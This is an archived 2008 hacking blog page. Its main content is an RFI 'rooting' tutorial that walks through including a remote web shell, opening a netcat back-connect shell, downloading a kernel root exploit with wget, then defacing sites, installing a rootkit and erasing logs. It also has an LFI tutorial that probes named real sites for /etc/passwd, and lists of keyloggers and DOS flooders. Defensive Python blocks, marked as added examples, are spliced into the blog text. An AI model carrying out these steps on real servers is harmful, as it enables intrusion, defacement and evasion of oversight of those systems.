techian.com

A Blog With No Limits

Archive for the ‘Hacking’ Category

Robots.txt harmless? Or dangerous?

Posted on September 1, 2008 by admin | No Comments

Robots.txt harmless? Or dangerous?
By K1u

So alright… what is this strange file in the root of your web directory, you ask?

Let me break it down… all it basically is, is a rule set for search engines.

Example of a robots.txt file.

# This is my robots.txt file!
User-agent: *
Disallow: /idontwantthisindexedbysearchengines/

Now let me explain what it is line by line.

# This names a user agent… for example Firefox or Konqueror; * matches any agent.
User-agent: *

# This is a rule for search engines not to index this folder.
Disallow: /idontwantthisindexedbysearchengines/

Now let's talk about why robots.txt can be dangerous.

All websites out there that use the robots file most likely have it exposed: it is a public file, and anyone can read the list of paths you asked search engines to stay away from.

Here, take this one – http://k0h.org/robots.txt

Well, you're probably asking what do I do now? Instead of using root folders for your “private” things, make a new folder named something like 021873257923 and then store the other folder in there. Note… never ever store very important things on your web server, even if it's “protected” by robots.txt; the file only asks crawlers not to index a path, it does not restrict access to it.

Now let's build our own robots.txt file.

# This is a comment… these are ignored.
User-agent: *
Disallow: /273432087423374242/

User-agent: Googlebot-Image
Disallow: /images

# Alexa’s bot is a bit aggressive, so I think I shall make it wait 1 minute (60 seconds) before it can request another page.
User-agent: IA_Archiver
Crawl-Delay: 60

Questions!

Ok… see, I have over 300 folders starting with admin… none should be indexed… what do I do? Is there some sort of wildcard I can use?

Simply use Disallow: /admin without the trailing /. A Disallow value is a path prefix, so that one rule covers every path that begins with /admin.

Are there engines that do not obey robots.txt?

Yep.

My host disallows robots.txt…

They probably don't… you just have not tried selecting “view hidden files” in your FTP client. Look into other methods… Google is your friend.

On a side note: I have not written this in the official tutorial, but a lot of people asked me why make a directory named 349823423423, for instance, and the answer is that it is harder for script kiddies to brute-force directory names on your site and find out your private directory's name.
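A small parser for the robots.txt format described above, written as an added example (not code from the original post): it splits the file into per-agent groups, applies the prefix-matching rule that makes `Disallow: /admin` cover every path starting with `/admin`, and flags Disallow entries that advertise sensitive-looking locations. The sample file is constructed from the post's own examples and the keyword list is an assumption.

```python
"""Parse robots.txt into per-agent rule groups, decide whether a path is
blocked for a crawler the way crawlers do (the named agent's group, else the
'*' group; Disallow values are path prefixes), and flag Disallow entries that
advertise sensitive locations. Added example, not from the original post."""
import re

# Constructed from the post's own examples.
SAMPLE = """\
# This is a comment... these are ignored.
User-agent: *
Disallow: /273432087423374242/
Disallow: /admin
User-agent: Googlebot-Image
Disallow: /images
User-agent: IA_Archiver
Crawl-Delay: 60
"""

# Assumed keyword list: robots.txt is public and is not access control, so a
# Disallow path with one of these words is a hint to anyone who reads the file.
SENSITIVE = re.compile(r"admin|private|backup|secret|config|db", re.I)


def parse(text):
    """Return {agent: {"disallow": [prefixes], "crawl_delay": int or None}}."""
    groups, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # comments are ignored
        if not line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            current = groups.setdefault(value.lower(), {"disallow": [], "crawl_delay": None})
        elif current is None:
            continue                           # rule before any User-agent line
        elif field == "disallow" and value:    # empty Disallow means allow everything
            current["disallow"].append(value)
        elif field == "crawl-delay":
            current["crawl_delay"] = int(value)
    return groups


def is_allowed(groups, agent, path):
    """Prefix match, so 'Disallow: /admin' covers /admin, /admin2 and /admin/x."""
    rules = groups.get(agent.lower(), groups.get("*", {"disallow": []}))
    return not any(path.startswith(prefix) for prefix in rules["disallow"])


def audit(groups):
    """List (agent, path) pairs whose Disallow value hints at sensitive content."""
    return [(a, p) for a, g in groups.items() for p in g["disallow"] if SENSITIVE.search(p)]
```

Run `audit(parse(SAMPLE))` against your own file to see which "hidden" paths it hands to every reader.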

R.F.I. Rooting Tutorial

Posted on September 1, 2008 by admin | No Comments

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mode: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

The aim of this tutorial is to give a very general picture of the process of rooting
a Linux server with Safe Mode: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

We can run a shell by exploiting the Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site (www.mysite.com, in the folder: shells).

After we enter the shell, first of all we will see the version of the kernel
at the top of the page or by typing uname -a in the command line.

To continue we must connect to the box with a back connection. This can be done in
two ways if we have a suitable shell.

We can use the Back-Connect module of the r57/c99 shell or upload a backconnector
to a writable folder.

Most shells have a back-connection feature without needing to upload the
Connect Back Shell (or another shell in Perl/C). We will analyze the first
way, which is built into the shell (in our example the shell is r57).

Initially we open NetCat and set it to listen on a specific port (this port must
be correctly opened/forwarded in the NAT/firewall if we have a router) in the
following way:

We will type 11457 in the port input (this is the default port for the latest versions
of the r57 shell). We can also use another port.

In Windows we press Start -> Run -> and type: cmd
After that we go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat responds: listening on [any] 11457 ...

In the central page of the r57 shell we find, under the menu ::: Net ::, the
back-connect option. In the IP form we will type our IP (use www.cmyip.com to see our IP if
we have a dynamic one).

In the Port form we put the port that we opened and that NetCat listens on.

If we press connect the shell will respond:

Now script try connect to  port 11457 ...

If our settings are correct NetCat will give us a shell on the server.

Now we will continue to the rooting process.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root privileges on the box. Depending on the version
of the Linux kernel there are different exploits. Sometimes the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites where we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googling, you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder, which is a standard writable folder.

We type: cd /tmp

To download the local root exploit we can use a download command for Linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (read the instructions of the exploit
before compiling).

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run it successfully and get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation.

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can proceed to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are no runtime errors (maybe the kernel is patched or something is wrong with
the exploit run or the large file) we will get root.

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites on the server or set up a rootkit (e.g.
SSHDoor) and take ssh/telnet shell access to the server.

We must erase all logs with a log cleaner in order to be safe. A good cleaner for this
job is the MIG Log Cleaner.

-

Local File Inclusion Tutorial

Posted on September 1, 2008 by admin | 1 Comment

Local File Inclusion Tutorial - Written by Xasulrev

[- How to Find LFI Vulnerability -]

How to find an LFI vulnerability? Well, the method I use is adding ..
Example:

www.site.com/index.php?p=..

Real World Examples:

http://www.jedit.org/index.php?page=..

Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line 63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63

This is not vulnerable.
A vulnerable one should look like:

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62

include is the function the script is using, for example:

<?php
// The page parameter comes straight from the query string and is passed
// to include() unchecked, which is what the [function.include] error reveals.
$page = $_GET['page'];
include($page);
?>

should be [function.include],
but

<?php
// Same unchecked parameter, but passed to require_once() instead of include().
$page = $_GET['page'];
require_once($page);
?>

should be [function.require_once] or [function.require].

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..

Gives us:

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear') in /indexm.php on line 164

[function.require]

So we know it is vulnerable.

If it is a Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php

Otherwise try

http://www.crew4sea.com/indexm.php?url=/etc/passwd

http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get something.
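Detection logic a defender can run over web-server access logs for the request patterns both the R.F.I. tutorial above and this LFI tutorial describe: a remote URL handed to a parameter, or `..` sequences and absolute paths like /etc/passwd handed to one. This is an added example, not code from either tutorial; the log lines, client IPs and the host evil.example are constructed.

```python
"""Scan web-server access-log lines for the two inclusion patterns the
tutorials describe: a remote URL supplied as a parameter value (RFI) and a
traversal sequence or absolute filesystem path supplied as one (LFI).
Added example, not from either tutorial."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed log lines in Apache common log format (not a real capture).
LOG = """\
203.0.113.5 - - [01/Sep/2008:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.9 - - [01/Sep/2008:10:00:07 +0000] "GET /index.php?page=http://evil.example/shells/evilscript.txt? HTTP/1.1" 200 9001
198.51.100.2 - - [01/Sep/2008:10:01:13 +0000] "GET /indexm.php?url=.. HTTP/1.1" 500 311
198.51.100.2 - - [01/Sep/2008:10:01:20 +0000] "GET /indexm.php?url=../../etc/passwd%00 HTTP/1.1" 200 1843
198.51.100.2 - - [01/Sep/2008:10:01:25 +0000] "GET /indexm.php?url=/etc/passwd HTTP/1.1" 200 1843
"""

REQUEST = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE = re.compile(r"^(https?|ftp)://", re.I)          # the value is itself a URL
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)|^/(etc|proc)/|\x00")  # .., /etc/..., NUL byte


def classify(value):
    """Return 'rfi', 'lfi' or None for one (possibly still encoded) parameter value."""
    decoded = unquote(value)
    if REMOTE.search(decoded):
        return "rfi"
    if TRAVERSAL.search(decoded):
        return "lfi"
    return None


def scan(log_text):
    """Return (ip, status, param, value, kind) for every suspicious query parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                hits.append((m["ip"], int(m["status"]), param, value, kind))
    return hits
```

A 200 status on an LFI hit (the /etc/passwd lines above) is the one to chase first, since the error-message probing in the tutorial produces 500s before anything is actually read.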

With traveling and use of many different computers, many geeks (and geek girls) often find a need to have a uniform set of tools handy wherever we may be. I’ve put together a list of 25 invaluable portable apps that can be installed on an iPod or thumb drive. These are really cool!

  1. TrueCrypt – encrypt your thumb drive to protect your information
  2. ToDoList – A task management tool that allows you to repeatedly sub-divide your tasks into more manageable pieces whilst still presenting a clean and intuitive user experience. (Windows Only)
  3. Portable Firefox – Leaves no personal information behind on the machine – you can take along your browser/extensions/bookmarks anywhere
  4. Pidgin Portable – All-in-one instant messaging (supports AIM, ICQ, MSN Messenger, Yahoo, G-Chat, etc)
  5. WS FTP32 – ftp client
  6. FileZilla – yet another ftp client
  7. Notepad2 – a fast light-weight advanced text editor with syntax highlighting
  8. Notepad++ – this is one of my favorite text editors – now made portable
  9. Color Cop – this is one of my favorite freeware apps – includes an eyedropper you can drag over any window to grab the color value. It then offers a palette of 42 complementary colors to the one you’ve picked.
  10. IrfanView – a light little graphics viewer/editor that packs a big punch. You can use it to work with screen captures, create slideshows and more
  11. GIMP – the popular open source image editor packaged as a portable app – very robust
  12. 7-Zip Portable – handles zip, gzip, tar, rar etc
  13. Allway Sync – syncs files between your thumb drive and PC
  14. Unknown Devices – helps you find out what the unknown devices in the device manager are
  15. TestDisk – data recovery software that can recover lost partitions or make drives bootable again
  16. UTorrent – my preferred bit torrent client – I love having this with me wherever I go
  17. Roeder’s .NET Reflector – recently purchased by Red Gate, this still-free app can be used to explore .NET assemblies, understand relationships between classes and methods, find where types are instantiated and exposed or check that code has been correctly obfuscated before release. There are also over 30 add-ins available.
  18. Process Explorer – formerly Filemon and Regmon, this is an invaluable sleuthing tool
  19. TightVNC – based on the popular VNC remote control software, this version can live on a thumb drive
  20. WinMerge – compares differences between files and merges changes. It has the same features as the desktop version
  21. Text2Html – a text to HTML converter – converts text files into HTML format
  22. Portable Apps Suite – this is the mac-daddy of them all – it includes Firefox, Thunderbird (email), Sunbird (calendar), ClamWin (antivirus), Pidgin (see above), Sumatra PDF Reader, KeePass Password Safe, OpenOffice, CoolPlayer (audio player) and even a couple of games
  23. Restoration – Recover accidentally deleted files – even after they were deleted from the recycle bin
  24. Infra Recorder Portable – cd and dvd burning
  25. RockXP – allows you to recover windows passwords or keys, change keys, display system password, and more – sneaky!

Miscellaneous Hacking Tools

Posted on August 30, 2008 by admin | No Comments

Monitor your network for AIM conversations.
Monitor your network for AIM conversations.
Gain admin control on a user.
Bluebox program.
Remove annoying hidden Mac files.
Howto chmod for retards.
Aim Crasher.
App manager for OS X and Darwin.
App manager for OS X.
Trojan.
Annoyingly ejects digital media repetitively.
Vuln detector.
OS fingerprinting tool.
Windows SSH client.
Registry cleaner.
Windows res editor.
Change the speeds of your fans.
Simple File Verification program.
Hidden user creation/deletion.
Web-based system administration.
Use Windows programs on *nix.

Keyloggers

Posted on August 30, 2008 by admin | No Comments

Key stroke recorder.
Windows keylogger.
Self explanatory.
Linux keylogger for kernels 2.2 and 2.4.
“Linux Key Logger”
CLI keylogger.

DOS flooding Tools

Posted on August 30, 2008 by admin | No Comments

Multipurpose attacker.
Scanner/Flooder
DOS flooder.
Great CLI DOS flooder.
Mass connector / flooder.

Networking Hacking Tools

Posted on August 30, 2008 by admin | No Comments

Find IPs over AIM.
Great port scanner.
Browse networks multiple IPs and more.
Monitor network for passwords, emails, and more.
HTTP sniffer.
LAN sniffer.
Advanced network monitor.
TCP/IP packet analyzer.
Scan for devices on your network.
Watch what others are doing.
Network vuln scanner.
“TCP/IP swiss army knife”
Web server scanner.
Port scanner.
Network traffic usage monitor.
Scan for FTP and SFTP servers.
Network sniffer.